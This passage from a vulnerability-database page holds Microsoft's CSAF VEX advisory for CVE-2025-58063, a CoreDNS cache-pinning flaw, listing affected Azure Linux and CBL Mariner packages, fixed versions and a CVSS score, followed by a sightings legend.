"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250917T170349-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-9084"
}
]
}
MSRC_CVE-2025-58063
Vulnerability from csaf_microsoft - Published: 2025-09-02 00:00 - Updated: 2025-09-11 01:01Summary
CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion
Notes
Additional Resources
To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle
Disclaimer
The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-58063 CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-58063.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion",
"tracking": {
"current_release_date": "2025-09-11T01:01:49.000Z",
"generator": {
"date": "2026-01-03T08:11:04.371Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-58063",
"initial_release_date": "2025-09-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-09-11T01:01:49.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
},
{
"category": "product_version",
"name": "2.0",
"product": {
"name": "CBL Mariner 2.0",
"product_id": "17086"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003cazl3 coredns 1.11.4-8",
"product": {
"name": "\u003cazl3 coredns 1.11.4-8",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "azl3 coredns 1.11.4-8",
"product": {
"name": "azl3 coredns 1.11.4-8",
"product_id": "20419"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 coredns 1.11.1-19",
"product": {
"name": "\u003ccbl2 coredns 1.11.1-19",
"product_id": "2"
}
},
{
"category": "product_version",
"name": "cbl2 coredns 1.11.1-19",
"product": {
"name": "cbl2 coredns 1.11.1-19",
"product_id": "20137"
}
}
],
"category": "product_name",
"name": "coredns"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 coredns 1.11.4-8 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 coredns 1.11.4-8 as a component of Azure Linux 3.0",
"product_id": "20419-17084"
},
"product_reference": "20419",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 coredns 1.11.1-19 as a component of CBL Mariner 2.0",
"product_id": "17086-2"
},
"product_reference": "2",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 coredns 1.11.1-19 as a component of CBL Mariner 2.0",
"product_id": "20137-17086"
},
"product_reference": "20137",
"relates_to_product_reference": "17086"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-58063",
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20419-17084",
"20137-17086"
],
"known_affected": [
"17084-1",
"17086-2"
],
"under_investigation": [
"17084-3"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-58063 CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-58063.json"
}
],
"remediations": [
{
"category": "vendor_fix",
"date": "2025-09-11T01:01:49.000Z",
"details": "1.11.4-9:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
},
{
"category": "vendor_fix",
"date": "2025-09-11T01:01:49.000Z",
"details": "1.11.1-21:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17086-2"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"environmentalsScore": 0.0,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"temporalScore": 7.1,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"17084-1",
"17086-2"
]
}
],
"title": "CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…